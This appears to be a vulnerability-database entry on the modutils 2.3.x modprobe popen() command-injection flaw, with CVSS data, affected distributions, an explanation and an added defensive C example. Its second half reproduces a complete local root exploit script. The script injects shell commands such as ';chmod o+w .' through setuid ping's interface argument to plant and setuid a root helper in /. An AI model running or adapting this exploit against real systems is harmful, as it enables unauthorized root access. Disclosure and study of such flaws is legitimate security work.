Published: 2001-01-09 00:00:00
Revised: 2008-09-05 16:22:38

[Original] modprobe in the modutils 2.3.x package on Linux systems allows a local user to execute arbitrary commands via shell metacharacters.


A vulnerability exists in modprobe in the modutils 2.3.x package on Linux systems. A local user can execute arbitrary commands by means of shell metacharacters.

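- CVSS (Base Score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system downtime]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]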

- CPE (Affected Platforms and Products)

cpe:/o:suse:suse_linux:7.0  SuSE SuSE Linux 7.0
cpe:/o:conectiva:linux:5.1  Conectiva Conectiva Linux 5.1
cpe:/o:mandrakesoft:mandrake_linux:7.2  MandrakeSoft Mandrake Linux 7.2
cpe:/o:suse:suse_linux:6.4  SuSE SuSE Linux 6.4
cpe:/o:redhat:linux:7.0  Red Hat Linux 7.0

- OVAL (Technical Details for Detection)


- Official Database Links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other Links and Resources
(UNKNOWN)  XF  linux-modprobe-execute-code
(UNKNOWN)  DEBIAN  20001120 modutils: local exploit
(UNKNOWN)  SUSE  SuSE-SA:2000:44
(UNKNOWN)  BUGTRAQ  20001112 RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)

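- Vulnerability Information

High risk  Unknown
2001-01-09 00:00:00 2006-09-15 00:00:00
A vulnerability exists in modprobe in the modutils 2.3.x package on Linux systems. A local user can execute arbitrary commands by means of shell metacharacters.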

- Advisories and Patches


- Vulnerability Information (20402)

Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability (EDBID:20402)
linux local
2000-11-12 Verified
0 Michal Zalewski
N/A
source :

Modutils is a component of many Linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, automatically loads the set of modules that corresponds to a "name" passed on the command line. Modprobe version 2.3.9, and possibly other versions around it, contains a vulnerability (present since March 12, 1999) that can lead to a local root compromise.

The problem is that modprobe uses popen() to execute the "echo" program with user input as its argument. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters in the user input cause other commands to be executed.

Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().

One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device that doesn't exist is specified on the command line, request_module() is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and execs modprobe with them. Arbitrary commands included in the module name argument (the device name given to ping) are then executed as root when popen() is called.

Successful exploitation of this will yield root access for the attacker.
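
The popen() problem described above, shown from the defender's side as an added example (not code from modutils or from the original page): the first function builds the kind of command string that ends up parsed by /bin/sh, and the other two show an allow-list check and a shell-free exec. The function names, the 64-character limit and the permitted character set are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern described above: the name is pasted into a string that
 * popen() hands to /bin/sh, so ';', '|' and backticks are parsed. */
int build_shell_cmd(const char *name, char *buf, size_t n) {
    int len = snprintf(buf, n, "echo %s", name);   /* unsafe by design */
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Hardened step 1 (assumed policy): allow-list the module name. */
int module_name_ok(const char *name) {
    size_t len = strlen(name);
    if (len == 0 || len > 64 || name[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Hardened step 2: run echo with an argv array and no shell, so the
 * name arrives as one literal argument. Returns 0 on success. */
int echo_noshell(const char *name, char *out, size_t n) {
    int fds[2], status;
    if (n == 0 || pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                                /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execlp("echo", "echo", name, (char *)NULL);
        _exit(127);
    }
    close(fds[1]);
    size_t used = 0; ssize_t r;
    while (used < n - 1 && (r = read(fds[0], out + used, n - 1 - used)) > 0)
        used += (size_t)r;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

With the constructed input `eth0;id`, the shell string contains a command separator, the allow-list rejects the name, and the argv-based call prints the text back unchanged.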


echo "RedHat 7.0 modutils exploit"
echo "(c) 2000 Michal Zalewski <>"
echo "Bug discovery: Sebastian Krahmer <>"
echo "Do not have to work on older / non-RH systems. This bug has been"
echo "introduced recently. Enjoy :)"
echo "This exploit is really hackish, because slashes are not allowed in"
echo "modprobe parameters, thus we have to play in modprobe's cwd (/)."

test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0
fi

echo "Phase 1: making / world-writable..."

$PING -I ';chmod o+w .' &>/dev/null

sleep 1

echo "Phase 2: compiling helper application in /..."

cat >/x.c <<_eof_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Phase 3: chown+chmod on our helper application..."

$PING -I ';chown 0 x' &>/dev/null
sleep 1
$PING -I ';chmod +s x' &>/dev/null
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system :("
  exit 1
fi

echo "Voila! Entering rootshell..."


echo "Thank you."

- Vulnerability Information

Linux modprobe popen Function Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

- Timeline

2000-11-12 Unknown
2000-11-12 Unknown

- Solution


Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete